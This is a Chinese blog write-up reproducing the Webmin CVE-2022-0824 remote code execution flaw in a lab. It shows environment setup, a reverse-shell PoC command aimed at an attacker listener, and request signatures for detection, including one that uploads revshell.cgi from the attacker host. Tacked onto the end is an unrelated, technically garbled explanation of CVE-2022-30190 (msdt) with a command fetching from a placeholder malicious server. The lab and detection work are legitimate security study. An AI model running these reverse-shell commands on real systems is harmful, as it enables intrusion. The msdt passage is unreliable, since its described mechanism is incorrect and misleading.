CVE-2022-0824 Webmin 远程代码执行漏洞复现

目录

0x01 声明:

0x02 简介:

0x03 漏洞概述:

0x04 影响版本:

0x05 环境搭建:

Vulfocus环境搭建:

漏洞环境搭建:

后台执行:

导入环境:

启动&访问:

​编辑Kali监听:​

0x06 漏洞复现:

POC:

下载地址:

执行POC:

0x07 流量分析:

特征一(强特征):

请求url:

Data参数:

服务端响应:

特征二(弱特征):

客户端请求url:

服务端响应:

特征三(强特征):

客户端请求url:

Data参数

服务端响应:

Message数据:

特征四(强特征):

客户端请求url:

Data参数

服务端响应:

Message数据:

特征五(关联特征):

客户端请求url:

Referer:

服务端响应:

特征六:

0x08 修复建议:


0x01 声明:

仅供学习参考使用,请勿用作违法用途,否则后果自负。

0x02 简介:

Webmin是功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。Webmin让您能够在远程使用支持HTTPS (SSL 上的 HTTP)协议的 Web 浏览器通过 Web界面管理您的主机。

Webmin是一个功能强大且灵活的基于 Web 的服务器管理控制面板,适用于类Unix系统。Webmin允许用户配置操作系统内部,例如用户、磁盘配额、服务或配置文件,以及修改和控制开源应用程序,例如Apache HTTPServer、PHP或MySQL。

0x03 漏洞概述:

Webmin是Webmin社区的一套基于Web的用于类Unix操作系统中的系统管理工具。webmin1.990之前版本存在权限提升漏洞,该漏洞源于错误的程序对高级本地过程调用。攻击者可以利用该漏洞能够修改操作系统文件系统并以运行应用程序权限执行操作系统命令。

0x04 影响版本:

Webmin < Webmin Webmin1.990

0x05 环境搭建:

Vulfocus环境搭建:

参考这篇文章:(Vulfocus漏洞靶场搭建_Evan Kang的博客-CSDN博客

漏洞环境搭建:

后台执行:

docker pull vulfocus/webmin_cve-2022-0824:latest

导入环境:

启动&访问:

 账号:root    密码:password

Kali监听: 

0x06 漏洞复现:

POC:

下载地址:

https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell

执行POC:

python3 Webmin-revshell.py -t http://192.168.119.155:18033 -c root:password -LS 192.168.119.215:9090 -L 192.168.119.215 -P 7777

0x07 流量分析:

特征一(强特征):

请求url:

POST  /session_login.cgi

Data参数:

user=root&pass=password

服务端响应:

HTTP/1.0 302 Moved Temporarily

特征二(弱特征):

客户端请求url:

GET /

服务端响应:

HTTP/1.0 200 Document follows

特征三(强特征):

客户端请求url:

POST /extensions/file-manager/http_download.cgi?module=filamin

Data参数

link=http%3A%2F%2F192.168.119.215%3A9090%2Frevshell.cgi&username=&password=&path=%2Fusr%2Fshare%2Fwebmin

服务端响应:

HTTP/1.0 200 Document follows

Message数据:

[{"error":"File with name `<strong><em>revshell.cgi</em></strong>` already exists in `<strong><tt>/usr/share/webmin</tt></strong>`."}]

特征四(强特征):

客户端请求url:

POST /extensions/file-manager/chmod.cgi?module=filemin&page=1&paginate=30

Data参数

name=revshell.cgi&perms=0755&applyto=1&path=%2Fusr%2Fshare%2Fwebmin

服务端响应:

HTTP/1.0 302 Moved Temporarily

Message数据:

path=%2Fusr%2Fshare%2Fwebmin&module=filemin&error=&page=1&query=&paginate=30&follow=&caseins=&grepstring=&fsid=&exclude=&regex=&all_items=

特征五(关联特征):

关联特征四中服务器Message数据的路径

客户端请求url:

GET /extensions/file-manager/list.cgi?path=%2Fusr%2Fshare%2Fwebmin&module=filemin&error=&page=1&query=&paginate=30&follow=&caseins=&grepstring=&fsid=&exclude=&regex=&all_items=

Referer:

http://192.168.119.155:18033/filemin/?xnavigation=1

服务端响应:

HTTP/1.0 200 Document follows

特征六:

就是反弹shell的内容了

0x08 修复建议:

更新到最新版本 附带厂商补丁链接:

https://github.com/webmin/webmin/commit/39ea464f0c40b325decd6a5bfb7833fa4a142e38

CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞复现过程。 首先,我们需要使用攻击者控制的远程服务器,以便在受影响的目标系统上执行恶意代码。我们创建以下PHP脚本,将其上传到我们的远程服务器上: ``` <?php system('calc.exe'); ?> ``` 这段代码将在目标系统上执行计算器应用程序,然后我们将通过"msdt.exe"命令行工具的特定参数利用该漏洞。 在受影响的目标系统上,我们将打开命令提示符,并执行以下命令: ``` msdt.exe "http://your-remote-server.com/evil-script.php" /id "netwoCpl" /showUI ``` 上述命令将启动"msdt.exe"并使用指定的URL作为参数,同时还指定了"networkCpl"作为"msdt.exe"的标识符。最后,使用"/showUI"参数显示用户界面。 当目标系统执行此命令时,"msdt.exe"会检索远程服务器上的脚本文件,并尝试执行该脚本。由于脚本文件具有恶意代码,它将在目标系统上执行计算器应用程序。 这就是CVE-2022-30190 msdt远程代码执行漏洞的一个简单复现过程。然而,值得注意的是,这只是为了说明该漏洞的原理,实际的攻击可能需要更复杂的技术和步骤。为了保护系统安全,我们建议及时更新受影响的软件,以修补此漏洞。还应该维护良好的网络安全措施,以减少被利用的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Kang_Sec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值